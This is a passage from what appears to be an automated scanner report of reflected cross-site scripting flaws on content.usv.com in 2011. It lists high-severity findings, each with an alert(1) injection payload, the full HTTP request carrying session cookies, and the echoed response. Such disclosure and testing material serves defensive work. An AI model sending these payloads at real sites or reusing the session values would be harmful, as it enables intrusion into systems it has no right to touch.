The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97d0e"%3balert(1)//580d8e3af75 was submitted in the REST URL parameter 1. This input was echoed as 97d0e";alert(1)//580d8e3af75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /97d0e"%3balert(1)//580d8e3af75/javascript/magnify_pipeline.js?v1.3 HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://content.usv.com/pages/john-buttrick
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=fab9bae2efc0dc99e41c60993b9a93ac; path=/; expires=Thu, 06-Oct-2011 20:44:15 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31840
Date: Wed, 05 Oct 2011 20:44:15 GMT
X-Varnish: 1169897192
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
e="text/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/97d0e";alert(1)//580d8e3af75/javascript/magnify_pipeline.js";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("ht
...[SNIP]...

3.136. http://content.usv.com/decor/javascript/magnify_stats.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /decor/javascript/magnify_stats.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4b8d"%3balert(1)//4f4b1065f78 was submitted in the REST URL parameter 1. This input was echoed as b4b8d";alert(1)//4f4b1065f78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b4b8d"%3balert(1)//4f4b1065f78/javascript/magnify_stats.js?v1.2 HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://content.usv.com/pages/john-buttrick
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=114da01b737277febeae2f39ceb55562; path=/; expires=Thu, 06-Oct-2011 20:44:15 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31824
Date: Wed, 05 Oct 2011 20:44:15 GMT
X-Varnish: 1169897204
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
e="text/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/b4b8d";alert(1)//4f4b1065f78/javascript/magnify_stats.js";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https
...[SNIP]...

3.137. http://content.usv.com/decor/javascript/magnify_twitter_feed.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /decor/javascript/magnify_twitter_feed.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c120"%3balert(1)//e7fea9d0c8f was submitted in the REST URL parameter 1. This input was echoed as 6c120";alert(1)//e7fea9d0c8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6c120"%3balert(1)//e7fea9d0c8f/javascript/magnify_twitter_feed.js?v2 HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://content.usv.com/pages/bug-labs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.1.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.5.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:46 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31850
Date: Wed, 05 Oct 2011 20:45:46 GMT
X-Varnish: 1169906903
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
e="text/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/6c120";alert(1)//e7fea9d0c8f/javascript/magnify_twitter_feed.js";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (
...[SNIP]...

3.138. http://content.usv.com/decor/track/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /decor/track/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0bd6"%3balert(1)//aff4dbd7322 was submitted in the REST URL parameter 1. This input was echoed as f0bd6";alert(1)//aff4dbd7322 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f0bd6"%3balert(1)//aff4dbd7322/track/dot.gif?sp=enterprise&session_id=630c9a4e8c93f5b745a3b9c0be7ca014&rand=702812&site=P8TH6404Q1P6NBW1&time=1317847388 HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://content.usv.com/pages/john-buttrick
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.4.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:44:46 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31755
Date: Wed, 05 Oct 2011 20:44:46 GMT
X-Varnish: 1169900415
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
e="text/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/f0bd6";alert(1)//aff4dbd7322/track/dot.gif";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document
...[SNIP]...

3.139. http://content.usv.com/pages/10gen [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/10gen

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fee4e"><script>alert(1)</script>27d7fd4aae7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesfee4e"><script>alert(1)</script>27d7fd4aae7/10gen HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.2.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.6.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:07 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31821
Date: Wed, 05 Oct 2011 20:45:07 GMT
X-Varnish: 1169902832
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesfee4e"><script>alert(1)</script>27d7fd4aae7/10gen%0AServer: content.usv.com%0APath: /pagesfee4e">
...[SNIP]...

3.140. http://content.usv.com/pages/10gen [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/10gen

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcf97"%3balert(1)//9bd0b370f83 was submitted in the REST URL parameter 1. This input was echoed as dcf97";alert(1)//9bd0b370f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesdcf97"%3balert(1)//9bd0b370f83/10gen HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; _chartbeat2=60p1quo02ok51v53.1317847385405; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.2.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.6.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:45:08 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31718
Date: Wed, 05 Oct 2011 20:45:08 GMT
X-Varnish: 1169902914
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesdcf97";alert(1)//9bd0b370f83/10gen";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.locatio
...[SNIP]...

3.141. http://content.usv.com/pages/albert-wenger [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/albert-wenger

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa3a"><script>alert(1)</script>4e97ef34ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesfaa3a"><script>alert(1)</script>4e97ef34ae0/albert-wenger HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.9.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.22.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:20:06 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31849
Date: Wed, 05 Oct 2011 21:20:06 GMT
X-Varnish: 650613692
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pagesfaa3a"><script>alert(1)</script>4e97ef34ae0/albert-wenger%0AServer: content.usv.com%0APath: /pagesfaa3a">
...[SNIP]...

3.142. http://content.usv.com/pages/albert-wenger [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/albert-wenger

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1c91"%3balert(1)//c9804153238 was submitted in the REST URL parameter 1. This input was echoed as d1c91";alert(1)//c9804153238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pagesd1c91"%3balert(1)//c9804153238/albert-wenger HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.9.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.22.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:20:07 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31744
Date: Wed, 05 Oct 2011 21:20:07 GMT
X-Varnish: 650613762
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pagesd1c91";alert(1)//c9804153238/albert-wenger";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document
...[SNIP]...

3.143. http://content.usv.com/pages/brad-burnham [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/brad-burnham

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 474ba"%3balert(1)//af9d30a255 was submitted in the REST URL parameter 1. This input was echoed as 474ba";alert(1)//af9d30a255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages474ba"%3balert(1)//af9d30a255/brad-burnham HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.8.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.19.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:16:42 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31734
Date: Wed, 05 Oct 2011 21:16:42 GMT
X-Varnish: 650595333
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages474ba";alert(1)//af9d30a255/brad-burnham";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.
...[SNIP]...

3.144. http://content.usv.com/pages/brad-burnham [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/brad-burnham

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c834"><script>alert(1)</script>021193172a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages8c834"><script>alert(1)</script>021193172a9/brad-burnham HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/team/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1120347815-1317847383708; mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.8.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.19.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; path=/; expires=Thu, 06-Oct-2011 21:16:41 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31844
Date: Wed, 05 Oct 2011 21:16:42 GMT
X-Varnish: 650595245
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
;body=This automatically generated email will help us improve Magnify.net.%0A%0AThanks for your help! -- The Magnify Team%0A%0A---%0A%0AStatus: 404 (File Not Found)%0ALink: http://content.usv.com/pages8c834"><script>alert(1)</script>021193172a9/brad-burnham%0AServer: content.usv.com%0APath: /pages8c834">
...[SNIP]...

3.145. http://content.usv.com/pages/bug-labs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/bug-labs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6003a"%3balert(1)//90e08d69bc0 was submitted in the REST URL parameter 1. This input was echoed as 6003a";alert(1)//90e08d69bc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages6003a"%3balert(1)//90e08d69bc0/bug-labs HTTP/1.1
Host: content.usv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.usv.com/investments/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mvp_session=630c9a4e8c93f5b745a3b9c0be7ca014; __qca=P0-1120347815-1317847383708; __utma=122599449.283091057.1317847383.1317847383.1317847383.1; __utmb=122599449.1.10.1317847384; __utmc=122599449; __utmz=122599449.1317847383.1.1.utmcsr=usv.com|utmccn=(referral)|utmcmd=referral|utmcct=/team/; _chartbeat2=60p1quo02ok51v53.1317847385405; __utma=186334253.1002554273.1317847294.1317847294.1317847294.1; __utmb=186334253.5.10.1317847294; __utmc=186334253; __utmz=186334253.1317847294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Apache
Set-Cookie: mvp_session=ca80b95ce57e26f5857670144f52cae9; path=/; expires=Thu, 06-Oct-2011 20:44:59 GMT
Content-Type: Text/HTML
X-Magnify-URL-Class: modperl-nocache
Content-Length: 31733
Date: Wed, 05 Oct 2011 20:44:59 GMT
X-Varnish: 1169902003
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
   
...[SNIP]...
xt/javascript">
   var _sf_async_config={uid:2250,domain:"aggregate.magnify.net"};
   (function(){
    function loadChartbeat() {
       window._sf_endpt=(new Date()).getTime();
       _sf_async_config.path = "/pages6003a";alert(1)//90e08d69bc0/bug-labs";
       var e = document.createElement('script');
       e.setAttribute('language', 'javascript');
       e.setAttribute('type', 'text/javascript');
       e.setAttribute('src',
        (("https:" == document.loca
...[SNIP]...

3.146. http://content.usv.com/pages/bug-labs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usv.com
Path:   /pages/bug-labs

Issue detail

